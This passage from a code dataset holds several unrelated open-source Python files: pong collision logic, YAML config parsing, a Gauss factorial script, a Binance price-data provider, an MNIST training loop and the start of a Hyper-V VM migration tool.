plr_info[\"normal_vector\"] = (\n self.pos-plr_info[\"closest_point\"]).normalize()\n else: # bottom\n plr_info[\"closest_point\"] = Vector2(\n self.pos.x, plr.y + plr.size_y)\n plr_info[\"normal_vector\"] = Vector2(0, 1)\n else:\n # Pos same level as player\n if is_right: # right\n plr_info[\"closest_point\"] = Vector2(\n plr.x + plr.size_x, self.pos.y)\n plr_info[\"normal_vector\"] = Vector2(1, 0)\n elif is_left: # left\n plr_info[\"closest_point\"] = Vector2(plr.x, self.pos.y)\n plr_info[\"normal_vector\"] = Vector2(-1, 0)\n else: # inside\n is_inside = True\n print(\"CODE RED\",\n plr_info[\"closest_point\"], plr_info[\"normal_vector\"])\n\n dist_sq = self.pos.distance_squared_to(plr_info[\"closest_point\"])\n\n if (dist_sq <= self.radius ** 2) or is_inside:\n # COLLISION\n self.pos = plr_info[\"closest_point\"] + \\\n self.radius * plr_info[\"normal_vector\"]\n self.reflect(plr_info[\"normal_vector\"])\n\n pygame.draw.line(self.screen, (255, 0, 0), (self.pos.x, self.pos.y),\n (plr_info[\"closest_point\"].x,\n plr_info[\"closest_point\"].y))\n\n def collide(self, players):\n # Walls\n # Top\n if self.pos.y - self.radius <= 0:\n self.pos.y = self.radius\n self.reflect(Vector2(0, 1))\n # print(\"Hit top\")\n # Right\n if self.pos.x + self.radius >= self.border_x:\n self.pos.x = self.border_x - self.radius\n self.reflect(Vector2(-1, 0))\n # print(\"Hit right\")\n # Bottom\n if self.pos.y + self.radius >= self.border_y:\n self.pos.y = self.border_y - self.radius\n self.reflect(Vector2(0, -1))\n # print(\"Hit bottom\")\n # Left\n if self.pos.x - self.radius <= 0:\n self.pos.x = self.radius\n self.reflect(Vector2(1, 0))\n # print(\"Hit left\")\n\n # Players\n if len(self.plrs_info) < len(players):\n self.plrs_info += [{\"closest_point\": Vector2(0, 0),\n \"normal_vector\": Vector2(0, 0)}] * \\\n (len(players) - len(self.plrs_info))\n\n for i, plr in enumerate(players):\n self.collide_plr(plr, self.plrs_info[i])\n","repo_name":"lelonS/pong-lol","sub_path":"classes/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":4959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71157265209","text":"import os\nimport yaml\n\nfrom ptp.utils.app_state import AppState\nfrom ptp.configuration.configuration_error import ConfigurationError\n\n\ndef display_globals(logger, globals_dict):\n \"\"\"\n Displays the global variables.\n\n :param logger: logger object\n\n :param globals_dict: Dictionary with globals\n \"\"\"\n # Create the string.\n global_str = 'Final global variables:\\n'\n global_str += '='*80 + '\\n'\n for key,value in globals_dict:\n global_str += \" {}: {}\\n\".format(key, value)\n global_str += '='*80 + '\\n'\n # Display.\n logger.info(global_str)\n\n\ndef display_parsing_results(logger, parsed_args, unparsed_args):\n \"\"\"\n Displays the properly & improperly parsed arguments (if any).\n\n :param logger: logger object\n\n :param parsed_args: Parsed command-line arguments\n\n :param unparsed_args: Unparsed command-line arguments\n\n \"\"\"\n # Log the parsed flags.\n flags_str = 'Properly parsed command line arguments: \\n'\n flags_str += '='*80 + '\\n'\n for arg in vars(parsed_args): \n flags_str += \" {}= {} \\n\".format(arg, getattr(parsed_args, arg))\n flags_str += '='*80 + '\\n'\n logger.info(flags_str)\n\n # Log the unparsed flags if any.\n if unparsed_args:\n flags_str = 'Invalid command line arguments: \\n'\n flags_str += '='*80 + '\\n'\n for arg in unparsed_args: \n flags_str += \" {} \\n\".format(arg)\n 
flags_str += '='*80 + '\\n'\n logger.warning(flags_str)\n\n\ndef export_experiment_configuration_to_yml(logger, log_dir, filename, config_interface_obj, user_confirm):\n \"\"\"\n Dumps the configuration to ``yaml`` file.\n\n :param logger: logger object\n\n :param log_dir: Directory used to host log files (such as the collected statistics).\n :type log_dir: str\n\n :param filename: Name of the ``yaml`` file to write to.\n :type filename: str\n\n :param config_interface_obj: Configuration interface object.\n\n :param user_confirm: Whether to request user confirmation.\n :type user_confirm: bool\n\n \"\"\"\n # -> At this point, all configuration for experiment is complete.\n\n # Log the resulting training configuration.\n conf_str = 'Final parameter registry configuration:\\n'\n conf_str += '='*80 + '\\n'\n conf_str += yaml.safe_dump(config_interface_obj.to_dict(), default_flow_style=False)\n conf_str += '='*80 + '\\n'\n \n logger.info(conf_str)\n\n # Save the resulting configuration into a .yaml settings file, under log_dir\n with open(log_dir + filename, 'w') as yaml_backup_file:\n yaml.dump(config_interface_obj.to_dict(), yaml_backup_file, default_flow_style=False)\n\n # Ask for confirmation - optional.\n if user_confirm:\n try:\n input('Press to confirm and start the experiment\\n')\n except KeyboardInterrupt:\n exit(0) \n\n\ndef load_class_default_config_file(class_type):\n \"\"\"\n Function loads default configuration from the default config file associated with the given class type and adds it to parameter registry.\n\n :param class_type: Class type of a given object.\n\n :raturn: Loaded default configuration.\n \"\"\"\n \n # Extract path to default config.\n module = class_type.__module__.replace(\".\",\"/\")\n rel_path = module[module.find(\"ptp\")+4:]\n # Build the abs path to the default config file of a given component/worker.\n abs_default_config = os.path.join(AppState().absolute_config_path, \"default\", rel_path) + \".yml\"\n\n # Check if file exists.\n if not os.path.isfile(abs_default_config):\n print(\"ERROR: The default configuration file '{}' for '{}' does not exist\".format(abs_default_config, class_type.__module__))\n exit(-1)\n\n try:\n # Open file and get parameter dictionary.\n with open(abs_default_config, 'r') as stream:\n param_dict = yaml.safe_load(stream)\n\n # Return default parameters so they can be added to the global registry.\n if param_dict is None:\n print(\"WARNING: The default configuration file '{}' is empty!\".format(abs_default_config))\n return {}\n else:\n return param_dict\n\n except yaml.YAMLError as e:\n print(\"ERROR: Couldn't properly parse the '{}' default configuration file. YAML error:\\n {}\".format(abs_default_config, e))\n exit(-2)\n\n\ndef recurrent_config_parse(configs_to_parse: list, configs_parsed: list, abs_config_path: str):\n \"\"\"\n Parses names of configuration files in a recursive manner, i.e. 
\\\n by looking for ``default_config`` sections and trying to load and parse those \\\n files one by one.\n\n :param configs_to_parse: List containing names of configuration files (with paths).\n :type configs_to_parse: list\n\n :param configs_parsed: Configurations that were already parsed (so we won't parse them many times).\n :type configs_parsed: list\n\n :param abs_config_path: Absolute path to ``config`` directory.\n\n :return: list of parsed configuration files.\n\n \"\"\"\n # Terminal condition.\n while len(configs_to_parse) > 0:\n\n # Get config.\n config = configs_to_parse.pop(0)\n\n # Skip empty names (after lose comas).\n if config == '':\n continue\n print(\"Info: Parsing the {} configuration file\".format(config))\n\n # Check if it was already loaded.\n if config in configs_parsed:\n print('Warning: Configuration file {} already parsed - skipping'.format(config))\n continue\n\n # Check if file exists.\n if not os.path.isfile(config):\n print('Error: Configuration file {} does not exist'.format(config))\n exit(-1)\n\n try:\n # Open file and get parameter dictionary.\n with open(config, 'r') as stream:\n param_dict = yaml.safe_load(stream)\n except yaml.YAMLError as e:\n print(\"Error: Couldn't properly parse the {} configuration file\".format(config))\n print('yaml.YAMLERROR:', e)\n exit(-1)\n\n # Remember that we loaded that config.\n configs_parsed.append(config)\n\n # Check if there are any default configs to load.\n if 'default_configs' in param_dict:\n default_configs_to_parse = param_dict['default_configs'].replace(\" \", \"\").split(',')\n # If there are - expand them to absolute paths.\n abs_default_configs_to_parse = [os.path.join(abs_config_path,config) for config in default_configs_to_parse]\n # Recursion!\n configs_parsed = recurrent_config_parse(abs_default_configs_to_parse, configs_parsed, abs_config_path)\n\n # Done, return list of loaded configs.\n return configs_parsed\n\n\ndef reverse_order_config_load(config_interface_obj, configs_to_load):\n \"\"\"\n Loads configuration files in reversed order.\n\n :param config_interface_obj: Configuration interface object.\n\n :param configs_to_load: list of configuration files to load (with absolute paths)\n \"\"\"\n for config in reversed(configs_to_load):\n # Load config from YAML file.\n config_interface_obj.add_config_params_from_yaml(config)\n print('Info: Loaded configuration from file {}'.format(config))\n\n\ndef get_value_list_from_dictionary(key, parameter_dict, accepted_values = []):\n \"\"\"\n Parses parameter values retrieved from a given parameter dictionary using key.\n Optionally, checks is all values are accepted.\n\n :param key: Key of the parameter.\n :param parameter_dict: Dictionary containing given key (e.g. 
config or globals)\n    :param accepted_values: List of accepted values (DEFAULT: [])\n\n    :return: List of parsed values\n    \"\"\"\n    parameter = parameter_dict[key]\n    # Preprocess parameter value.\n    if (type(parameter) == str):\n        if parameter == '':\n            # Return empty list.\n            return []\n        else:\n            # Process and split.\n            values = parameter.replace(\" \",\"\").split(\",\")\n    else:\n        values = parameter # list\n    assert type(values) == list, \"Parameter value must be a list\"\n\n    # Test values one by one.\n    if len(accepted_values) > 0:\n        for value in values:\n            if value not in accepted_values:\n                raise ConfigurationError(\"One of the values in '{}' is invalid (current: '{}', accepted: {})\".format(key, value, accepted_values))\n\n    # Return list.\n    return values\n\ndef get_value_from_dictionary(key, parameter_dict, accepted_values = []):\n    \"\"\"\n    Parses the value of the parameter retrieved from a given parameter dictionary using key.\n    Optionally, checks whether the value is one of the accepted values.\n\n    :param key: Key of the parameter.\n    :param parameter_dict: Dictionary containing given key (e.g. config or globals)\n    :param accepted_values: List of accepted values (DEFAULT: [])\n\n    :return: Parsed value\n    \"\"\"\n    value = parameter_dict[key]\n    assert type(value) == str, \"Parameter value must be a string\"\n    # Preprocess parameter value.\n    if value == '':\n        return None\n\n    # Test the value.\n    if len(accepted_values) > 0:\n        if value not in accepted_values:\n            raise ConfigurationError(\"One of the values in '{}' is invalid (current: '{}', accepted: {})\".format(key, value, accepted_values))\n\n    # Return value.\n    return value\n","repo_name":"IBM/pytorchpipe","sub_path":"ptp/configuration/config_parsing.py","file_name":"config_parsing.py","file_ext":"py","file_size_in_byte":9308,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"77"}
{"seq_id":"11919001987","text":"#gauss factorial of a number n is defined as the product of all positive numbers <= n that are relatively prime to n\r\n\r\n#project euler problem:\r\n#G(n) = gauss_factorial(1) * gauss_factorial(2) * ... * gauss_factorial(n), i.e. the product of gauss_factorial(i) for i = 1..n\r\n\r\n\r\n\r\ndef CheckIfPositivePrime(value):\r\n    # trial division by 6k +/- 1 candidates up to sqrt(value)\r\n    if value <= 0:\r\n        return False\r\n    if value == 1 or value == 2 or value == 3:\r\n        return True\r\n    if value % 2 == 0 or value % 3 == 0:\r\n        return False\r\n    i = 5\r\n    while i * i <= value:\r\n        if value % i == 0 or value % (i + 2) == 0:\r\n            return False\r\n        i += 6\r\n    return True\r\n\r\n\r\n\r\ndef FindFactors(value):\r\n    if value <= 1:\r\n        return []\r\n    else:\r\n        factorsArray = []\r\n\r\n        for i in range(2, value):\r\n            if value % i == 0:\r\n                factorsArray.append(i)\r\n\r\n        return factorsArray\r\n\r\n\r\n\r\ndef FindCoprimeNumbers(value):\r\n    primeArray = []\r\n    nonPrimeArray = []\r\n\r\n    for i in range(1,value):\r\n        if CheckIfPositivePrime(i) == True:\r\n            primeArray.append(i)\r\n        else:\r\n            nonPrimeArray.append(i)\r\n\r\n    factorsArray = FindFactors(value)\r\n    coprimeArray = []\r\n\r\n    for i in primeArray:\r\n        if i not in factorsArray:\r\n            coprimeArray.append(i)\r\n\r\n    for i in nonPrimeArray:\r\n        factorsArrayForNonprime = FindFactors(i)\r\n        hasSameFactors = False\r\n\r\n        for j in factorsArrayForNonprime:\r\n            if j in factorsArray:\r\n                hasSameFactors = True\r\n\r\n        if hasSameFactors == False:\r\n            coprimeArray.append(i)\r\n\r\n    return coprimeArray\r\n\r\n\r\n\r\ndef FindProductOfArray(values):\r\n    if values == []:\r\n        return\r\n\r\n    product = 1  # identity element, so each value is multiplied in exactly once\r\n\r\n    for i in values:\r\n        product *= i\r\n\r\n    return product\r\n\r\n\r\n\r\ndef FindGaussFactorial(value):\r\n    coprimeArray = 
FindCoprimeNumbers(value)\r\n    product = FindProductOfArray(coprimeArray)\r\n\r\n    return product\r\n\r\n\r\n\r\ndef AnswerProblem(n):\r\n    gaussFactorialArray = []\r\n\r\n    for i in range(1, n + 1):\r\n        gaussFactorial = FindGaussFactorial(i)  # compute once per i instead of twice\r\n        if gaussFactorial != None:\r\n            gaussFactorialArray.append(gaussFactorial)\r\n    return FindProductOfArray(gaussFactorialArray)\r\n\r\n\r\n\r\n#question is find G(10^8) mod 1 000 000 007\r\nanswer = AnswerProblem(10**8) % 1000000007\r\n\r\n\r\n\r\n","repo_name":"Aemxander/gauss-factorial","sub_path":"GaussFactorial.py","file_name":"GaussFactorial.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"38365188164","text":"from datetime import datetime\r\nfrom typing import Union, Sequence\r\n\r\nimport pytz\r\nimport pandas as pd\r\nfrom binance import Client\r\nfrom numpy import float64\r\n\r\nfrom qf_lib.brokers.binance_broker.binance_contract_ticker_mapper import BinanceContractTickerMapper\r\nfrom qf_lib.common.utils.miscellaneous.to_list_conversion import convert_to_list\r\n\r\nfrom qf_lib.common.enums.frequency import Frequency\r\nfrom qf_lib.common.enums.price_field import PriceField\r\nfrom qf_lib.common.tickers.tickers import Ticker\r\nfrom qf_lib.common.utils.dateutils.date_format import DateFormat\r\nfrom qf_lib.common.utils.dateutils.relative_delta import RelativeDelta\r\nimport os\r\nfrom qf_lib.common.utils.logging.qf_parent_logger import qf_logger\r\n\r\nfrom qf_lib.containers.dataframe.qf_dataframe import QFDataFrame\r\nfrom qf_lib.data_providers.csv.csv_data_provider import CSVDataProvider\r\n\r\n\r\nclass BinanceDataProvider(CSVDataProvider):\r\n    \"\"\"\r\n    Binance Data Provider that downloads data in the range from start_date to end_date. Particularly, the data provider can be\r\n    used in live trading with end_date corresponding to current time. Downloaded data is saved in .csv format and then\r\n    loaded into CSVDataProvider\r\n\r\n    Parameters\r\n    -----------\r\n    path: str\r\n        path to directory where the files should be saved\r\n    filename: str\r\n        name of the file in which data should be saved e.g. 
Binance_data_{end_time.strftime(\"%Y-%m-%d %H_%M_%S\")}.csv\n tickers: Union[Ticker, Sequence[Ticker]]\n one or a list of tickers, used further to download the prices data\n start_date: datetime\n beginning of the data in local time (it is automatically converted to UTC time used by binance)\n end_date: datetime\n end of the data in local time (it is automatically converted to UTC time used by binance)\n contract_ticker_mapper: BinanceContractTickerMapper\n object which contains a set of parameters for every ticker and allows to map a ticker onto a broker\n specific contract / ticker object that could be afterwards used while sending the Order.\n frequency: Frequency = Frequency.MIN_1\n frequency of the data\n \"\"\"\n\n def __init__(self, path: str, filename: str, tickers: Union[Ticker, Sequence[Ticker]], start_date: datetime, end_date: datetime,\n contract_ticker_mapper: BinanceContractTickerMapper, frequency: Frequency = Frequency.MIN_1):\n\n if frequency not in [Frequency.DAILY, Frequency.MIN_1]:\n raise NotImplementedError(\"Only 1m and DAILY freq is supported now\")\n\n self.contract_ticker_mapper = contract_ticker_mapper\n\n tickers, _ = convert_to_list(tickers, Ticker)\n\n self.frequency_mapping = {\n Frequency.DAILY: '1d',\n Frequency.MIN_1: '1m'\n }\n\n index_col = 'Dates'\n field_to_price_field_dict = {'Open': PriceField.Open, 'High': PriceField.High, 'Low': PriceField.Low,\n 'Close': PriceField.Close, 'Volume': PriceField.Volume}\n fields = ['Open', 'High', 'Low', 'Close', 'Volume']\n ticker_col = 'Ticker'\n\n self.logger = qf_logger.getChild(self.__class__.__name__)\n\n self.logger.info(\"creating BinanceDataProvider\")\n self.client = Client()\n\n filepath = os.path.join(path, filename)\n\n self._load_data(filepath, tickers, fields, start_date, end_date, frequency, index_col, ticker_col)\n\n super().__init__(filepath, tickers, index_col, field_to_price_field_dict, fields, start_date, end_date, frequency, ticker_col=ticker_col)\n\n def _load_data(self, filepath, tickers, fields, start_date, end_date, frequency, index_col, ticker_col):\n if not os.path.isfile(filepath):\n list_of_dfs = [self._download_binance_data_df(ticker, start_date, end_date, frequency, ticker_col) for ticker in tickers]\n else:\n\n list_of_dfs = []\n df = pd.read_csv(filepath, index_col=index_col, parse_dates=['Dates'], engine='python')\n\n infer_freq = Frequency.infer_freq(df.index)\n\n if infer_freq != frequency:\n raise ValueError(f'Requested frequency: {frequency} is different from the one in the file: {infer_freq}')\n\n for ticker in tickers:\n\n current_df = df[df[ticker_col] == ticker.as_string()]\n\n if current_df.empty:\n current_end_date = start_date\n else:\n current_end_date = current_df.index[-1].to_pydatetime()\n\n if current_end_date == end_date:\n list_of_dfs.append(current_df)\n continue\n\n df_to_append = self._download_binance_data_df(ticker, current_end_date, end_date, frequency, ticker_col)\n combined_df = pd.concat([current_df, df_to_append])\n combined_df = combined_df[~combined_df.index.duplicated(keep='last')] # to have the most recent bar data updated\n list_of_dfs.append(combined_df)\n\n df = pd.concat(list_of_dfs)\n df.loc[:, fields] = df.loc[:, fields].astype(float64)\n df.to_csv(filepath)\n\n def _download_binance_data_df(self, ticker, start_time: datetime, end_time: datetime, frequency, ticker_col) -> QFDataFrame:\n start_time = start_time + RelativeDelta(second=0, microsecond=0)\n end_time = end_time + RelativeDelta(second=0, microsecond=0)\n\n # the requested time has to be 
in UTC\r\n        start_time_str = start_time.astimezone(pytz.UTC).strftime(DateFormat.FULL_ISO.format_string)\r\n        end_time_str = end_time.astimezone(pytz.UTC).strftime(DateFormat.FULL_ISO.format_string)\r\n\r\n        res_dict = {'Dates': [], 'Open': [], 'High': [], 'Low': [], 'Close': [], 'Volume': [], ticker_col: []}\r\n\r\n        symbol = self.contract_ticker_mapper.ticker_to_contract(ticker)\r\n\r\n        res = self.client.get_historical_klines(symbol=symbol,\r\n                                                interval=self.frequency_mapping[frequency],\r\n                                                start_str=start_time_str, end_str=end_time_str, limit=1000)\r\n\r\n        for i in res:\r\n            # response is parsed to local time from unix milliseconds\r\n            res_dict['Dates'].append(datetime.fromtimestamp(i[0] / 1000).strftime('%Y-%m-%d %H:%M:%S'))\r\n            res_dict['Open'].append(i[1])\r\n            res_dict['High'].append(i[2])\r\n            res_dict['Low'].append(i[3])\r\n            res_dict['Close'].append(i[4])\r\n            res_dict['Volume'].append(i[5])\r\n            res_dict[ticker_col].append(ticker.as_string())\r\n\r\n        df = QFDataFrame(res_dict).set_index('Dates')\r\n        df.index = pd.to_datetime(df.index, format=str(DateFormat.FULL_ISO))\r\n\r\n        missing_dates = pd.date_range(start=start_time, end=end_time, freq=frequency.to_pandas_freq()).difference(df.index)\r\n\r\n        if not missing_dates.empty:\r\n            self.logger.info(f'Missing dates: {missing_dates} for ticker: {ticker}')\r\n\r\n        df = df[~df.index.duplicated(keep='first')]\r\n        return df\r\n","repo_name":"quarkfin/qf-lib","sub_path":"qf_lib/data_providers/binance_dp/binance_data_provider.py","file_name":"binance_data_provider.py","file_ext":"py","file_size_in_byte":6995,"program_lang":"python","lang":"en","doc_type":"code","stars":396,"dataset":"github-code","pt":"77"}
{"seq_id":"41670318645","text":"import torch\nfrom matplotlib import pyplot as plt\nfrom torch import nn, optim\nfrom torch.utils.data import random_split, DataLoader\nfrom torchvision import datasets, transforms\n\ndataset = datasets.MNIST(\n\t'data/mnist', train=True, download=True, transform=transforms.ToTensor())\n\nimg_batch, label = dataset[0]\n\nimg_batch.shape\n\nplt.imshow(img_batch[0], cmap='gray')\nplt.show()\n\ntrain, val = random_split(dataset, [55000, 5000])\ntrain_loader = DataLoader(train, batch_size=32)\nval_loader = DataLoader(val, batch_size=32)\n\n# Step 1: Define the model\nmodel = nn.Sequential(\n\tnn.Linear(784, 128),\n\tnn.ReLU(),\n\tnn.Linear(128, 64),\n\tnn.ReLU(),\n\tnn.Linear(64, 64),\n\tnn.ReLU(),\n\tnn.Linear(64, 128),\n\tnn.ReLU(),\n\tnn.Linear(128, 10)\n)\n\n# Step 2: Define an optimizer\noptimizer = optim.Adam(model.parameters(), lr=1e-2)\n\n# Step 3: Define a loss function\nloss = nn.CrossEntropyLoss()\n\n# Step 4: Train the model\nepochs = 100\nfor epoch in range(epochs):\n\ttrain_losses = list()\n\ttrain_accuracy = list()\n\tfor batch in train_loader:\n\t\tx, y = batch\n\n\t\t# Convert this to (batch, dimensions) without the color channel\n\t\tb = x.size(0)\n\t\tx = x.view(b, -1)\n\n\t\t# Forward pass\n\t\tlogits = model(x)\n\n\t\t# Calculate loss\n\t\tJ = loss(logits, y)\n\n\t\t# Reset the accumulated gradient map\n\t\tmodel.zero_grad()\n\n\t\t# Backpropagate the error\n\t\tJ.backward()\n\n\t\t# Update the parameters\n\t\toptimizer.step()\n\n\t\ttrain_losses.append(J.item())\n\t\t# fraction of correct predictions in the batch\n\t\ttrain_accuracy.append(\n\t\t\ty.eq(logits.argmax(dim=1)).float().mean())\n\n\t# Validation\n\tval_losses = list()\n\tval_accuracy = list()\n\tfor batch in val_loader:\n\t\tx, y = batch\n\n\t\t# Convert this to (batch, dimensions) without the color channel\n\t\tb = x.size(0)\n\t\tx = x.view(b, -1)\n\n\t\t# Forward pass (no gradients needed during validation)\n\t\twith torch.no_grad():\n\t\t\tlogits = model(x)\n\n\t\t# Calculate 
loss\n\t\tJ = loss(logits, y)\n\n\t\tval_losses.append(J.item())\n\t\tval_accuracy.append(\n\t\t\ty.eq(logits.argmax(dim=1)).float().mean())\n\n\tprint(\n\t\tf'Epoch {epoch + 1}, train loss: {torch.tensor(train_losses).mean():.2f}, '\n\t\tf'val loss: {torch.tensor(val_losses).mean():.2f}\\n'\n\t\tf'train accuracy: {torch.tensor(train_accuracy).mean():.2f}, '\n\t\tf'val accuracy: {torch.tensor(val_accuracy).mean():.2f}\\n')\n","repo_name":"esperie/ml_basics","sub_path":"applications/image_matching/algo/digits_recognition.py","file_name":"digits_recognition.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"5022958335","text":"#!/usr/bin/env python\r\n\r\n## Copyright (c) 2014 Citrix Systems, Inc. All Rights Reserved.\r\n## You may only reproduce, distribute, perform, display, or prepare derivative works of this file pursuant to a valid license from Citrix.\r\n\r\nfrom lib.hyperv import HyperV # the class\r\nfrom lib.hyperv import hyperv # the connection\r\nimport lib.cloudstack\r\nfrom lib.cloudstack import cs\r\nimport json\r\nimport hashlib\r\nimport ntpath\r\nimport os\r\nimport pprint\r\nimport sys\r\nimport time\r\nimport re\r\nimport traceback\r\nimport lib.config_manager\r\nfrom lib.config_manager import ConfigManager\r\nimport common_services\r\nfrom common_services import CommonServices\r\n\r\nclass HypverMigrator:\r\n\r\n\tdef __init__(self, confMgr):\r\n\t\tHYPERVISOR_TYPE = 'hyperv'\r\n\t\tdefaultHypervConfig =[\r\n\t\t('HYPERVISOR', 'hypervisorType', HYPERVISOR_TYPE),\r\n\t\t('HYPERVISOR', 'migration_input_file', './input/migrate_hyperv_input.json'), \r\n\t\t('HYPERVISOR', 'pscp_exe', 'C:\\pscp.exe'),\r\n\t\t('HYPERVISOR', 'log_file', './logs/hyperv_api.log'),\r\n\t\t('STATE', 'active_migration', 'False')\r\n\t\t]\r\n\r\n\t\tself.confMgr = confMgr\r\n\t\tif not self.confMgr:\r\n\t\t\tconfigFile = './settings-' + HYPERVISOR_TYPE + '.conf'\r\n\t\t\tpersistentStore = './running-'+HYPERVISOR_TYPE+'.conf'\r\n\t\t\tself.confMgr = ConfigManager(configFile, persistentStore, defaultHypervConfig)\r\n\r\n\t\tself.confMgr.addOptionsToSection('CLOUDSTACK', lib.cloudstack.getCloudStackConfig()) #let's put all the running configs in the same persistent store\r\n\t\tself.log = common_services.createMigrationLog(self.confMgr)\r\n\t\tself.commonService = CommonServices(self.confMgr)\r\n\r\n\tdef updateVms(self, vms):\r\n\t\tself.confMgr.updateOptions([('STATE', 'vms', vms)], True)\r\n\r\n\r\n\tdef get_vm_raw_from_src(self, vm_in):\r\n\t\t# make sure the minimum fields were entered and they have not been processed already\r\n\t\tif 'hyperv_vm_name' in vm_in and 'hyperv_server' in vm_in:\r\n\t\t\tobjs, ok = hyperv.powershell('Get-VM -Name \"%s\" -Server \"%s\"' % (vm_in['hyperv_vm_name'], vm_in['hyperv_server']))\r\n\t\t\tif objs and ok: # make sure it found the specified VM\r\n\t\t\t\treturn objs[0]\r\n\r\n\tdef get_vm_info(self, vm_id, vm_in, vm_raw):\r\n\t\tif not vm_raw: # vm_raw will be None if we are not running the discovery process and are instead just reading an input file of vms to be migrated.\r\n\t\t\tvm_raw = self.get_vm_raw_from_src(vm_in)\r\n\r\n\t\tif vm_raw: # make sure it found the specified VM\r\n\t\t\tself.log.info('\\nGETTING VM INFO %s\\n%s' % (vm_in['hyperv_vm_name'], '----------'+'-'*len(vm_in['hyperv_vm_name'])))\r\n\r\n\t\t\tvm_out = vm_in\r\n\t\t\tvm_out['id'] = vm_id\r\n\t\t\t\r\n\t\t\tvm_out['src_name'] = vm_raw['ElementName']\r\n\t\t\tvm_out['src_type'] = 
vm_raw['ElementName']\r\n\r\n\t\t\t# get cores, cpus\r\n\t\t\tcpu, ok = hyperv.powershell('Get-VMCPUCount -VM \"%s\" -Server \"%s\"' % (vm_in['hyperv_vm_name'], vm_in['hyperv_server']))\r\n\t\t\tif ok:\r\n\t\t\t\tvm_out['src_cpus'] = int(cpu[0]['ProcessorsPerSocket']) * int(cpu[0]['SocketCount'])\r\n\t\t\telse:\r\n\t\t\t\tself.handleError('Get-VMCPUCount powershell command failed on %s' % (vm_in['hyperv_vm_name']))\r\n\t\t\t\tself.handleError('ERROR: Check the \"%s\" log for details' % (self.confMgr.get('HYPERVISOR', 'log_file')))\r\n\r\n\t\t\t# get memory\r\n\t\t\tmemory, ok = hyperv.powershell('Get-VMMemory -VM \"%s\" -Server \"%s\"' % (vm_in['hyperv_vm_name'], vm_in['hyperv_server']))\r\n\t\t\tif ok:\r\n\t\t\t\tvm_out['src_memory'] = int(memory[0]['Reservation'])\r\n\t\t\telse:\r\n\t\t\t\tself.handleError('Get-VMMemory powershell command failed on %s' % (vm_in['hyperv_vm_name']))\r\n\t\t\t\tself.handleError('ERROR: Check the \"%s\" log for details' % (self.confMgr.get('HYPERVISOR', 'log_file')))\r\n\r\n\t\t\t# record their starting state and bring down if running\r\n\t\t\tif int(vm_raw['EnabledState']) == HyperV.VM_RUNNING:\r\n\t\t\t\tvm_out['state'] = 'running'\r\n\t\t\t\tself.log.info('VM %s is Running' % (vm_in['hyperv_vm_name']))\r\n\t\t\telif int(vm_raw['EnabledState']) == HyperV.VM_STOPPED:\r\n\t\t\t\tvm_out['state'] = 'stopped'\r\n\t\t\t\tself.log.info('VM %s is Stopped' % (vm_in['hyperv_vm_name']))\r\n\t\t\telse: # this should be improved...\r\n\t\t\t\tvm_out['state'] = 'unknown'\r\n\t\t\t\tself.handleError('VM %s is in an Unknown state' % (vm_in['hyperv_vm_name']))\r\n\r\n\t\t\tif (vm_out['state'] == 'running' and ok) or vm_out['state'] == 'stopped':\r\n\t\t\t\tdisks, ok = hyperv.powershell('Get-VMDisk -VM \"%s\"' % (vm_in['hyperv_vm_name']))\r\n\t\t\t\tif ok:\r\n\t\t\t\t\t# if 'src_disks' not in vms[vm_id] or (\r\n\t\t\t\t\t# \t\t'src_disks' in vms[vm_id] and len(vms[vm_id]['src_disks']) != len(disks)):\r\n\t\t\t\t\tvm_out['src_disks'] = []\r\n\t\t\t\t\tfor disk in disks:\r\n\t\t\t\t\t\tif 'DriveName' in disk and disk['DriveName'] == 'Hard Drive' and 'DiskImage' in disk:\r\n\t\t\t\t\t\t\tvm_out['src_disks'].append({\r\n\t\t\t\t\t\t\t\t'size': '0',\r\n\t\t\t\t\t\t\t\t'label': disk['DriveName'],\r\n\t\t\t\t\t\t\t\t'path': disk['DiskImage'], # the src path\r\n\t\t\t\t\t\t\t\t'name':ntpath.split(disk['DiskImage'])[1].replace(' ', '-').split('.')[0],\r\n\t\t\t\t\t\t\t\t'url':'%s://%s:%s%s%s' % (\r\n\t\t\t\t\t\t\t\t\t'https' if self.confMgr.get('FILESERVER', 'port') == '443' else 'http',\r\n\t\t\t\t\t\t\t\t\tself.confMgr.get('FILESERVER', 'host'),\r\n\t\t\t\t\t\t\t\t\tself.confMgr.get('FILESERVER', 'port'),\r\n\t\t\t\t\t\t\t\t\tself.confMgr.get('FILESERVER', 'base_uri'),\r\n\t\t\t\t\t\t\t\t\tntpath.split(disk['DiskImage'])[1].replace(' ', '-')\r\n\t\t\t\t\t\t\t\t\t)\r\n\t\t\t\t\t\t\t\t})\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.handleError('Get-VMDisk powershell command failed on %s' % (vm_in['hyperv_vm_name']))\r\n\t\t\t\t\tself.handleError('ERROR: Check the \"%s\" log for details' % (self.confMgr.get('HYPERVISOR', 'log_file')))\r\n\t\t\t\tvm_out['migrationState'] = ''\r\n\t\treturn vm_out\r\n\r\n\r\n\tdef discover_vms(self):\r\n\t\tself.confMgr.refresh()\r\n\t\tif self.confMgr.has_option('STATE', 'vms'):\r\n\t\t\t# initialize the 'vms' variable from the existing config...\r\n\t\t\tvms = json.loads(self.confMgr.get('STATE', 'vms'))\r\n\t\telse:\r\n\t\t\tvms = {}\r\n\r\n\t\tif self.confMgr.has_option('STATE', 'vm_order'):\r\n\t\t\torder = json.loads(self.confMgr.get('STATE', 
